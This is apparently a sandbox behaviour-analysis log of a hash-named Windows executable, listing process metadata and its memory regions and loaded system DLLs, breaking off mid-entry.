# Flog Txt Version 1 # Analyzer Version: 4.5.0 # Analyzer Build Date: Apr 22 2022 21:04:16 # Log Creation Date: 05.05.2022 02:28:30.056 Process: id = "1" image_name = "d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe" page_root = "0x6e0a1000" os_pid = "0xb5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x78c" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 121 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 122 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 123 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 124 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 125 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 126 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 127 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 128 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 129 start_va = 0x1200000 end_va = 0x1384fff monitored = 1 entry_point = 0x1229132 region_type = mapped_file name = "d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe") Region: id = 130 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 131 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 132 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 133 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 134 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 135 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 274 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 275 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 276 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 277 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 278 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 279 start_va = 0x5a0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 280 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 281 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 282 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 283 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 284 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 285 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 286 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 287 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 288 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 289 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 290 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 291 start_va = 0x5a0000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 292 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 293 start_va = 0x4c0000 end_va = 0x4e9fff monitored = 0 entry_point = 0x4c5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 294 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 295 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 296 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 297 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 298 start_va = 0x960000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 299 start_va = 0x1390000 end_va = 0x278ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001390000" filename = "" Region: id = 300 start_va = 0x4d0000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 301 start_va = 0x6d3c0000 end_va = 0x6d3c5fff monitored = 0 entry_point = 0x6d3c1490 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 302 start_va = 0xaf0000 end_va = 0xda4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 303 start_va = 0xdb0000 end_va = 0xeebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 304 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 305 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 306 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 307 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 308 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 309 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 310 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 311 start_va = 0x4d0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 312 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 313 start_va = 0x2790000 end_va = 0xcd8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 317 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 318 start_va = 0x5a0000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 319 start_va = 0x1c0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 320 start_va = 0x1e0000 end_va = 0x1eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 321 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 322 start_va = 0xcd90000 end_va = 0xd0c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 323 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 324 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 325 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 326 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 327 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 328 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 329 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 330 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 331 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 332 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 333 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 334 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 335 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 336 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 337 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 338 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 339 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 340 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 341 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 342 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 343 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 344 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 345 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 346 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 347 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 348 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 349 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 350 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 351 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 352 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 353 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 354 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 355 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 356 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 357 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 358 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 359 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 360 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 361 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 362 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 363 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 364 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 365 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 366 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 367 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 368 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 369 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 370 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 371 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 372 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 373 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 374 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 375 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 376 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 377 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 378 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 379 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 380 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 381 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 382 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 383 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 384 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 385 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 386 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 387 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 388 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 389 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 390 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 391 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 392 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 393 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 394 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 395 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 396 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 397 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 398 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 399 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 400 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 401 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 402 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 403 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 404 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 405 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 406 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 407 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 408 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 409 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 410 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 411 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 412 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 413 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 414 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 415 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 416 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 417 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 418 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 419 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 420 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 421 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 422 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 423 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = 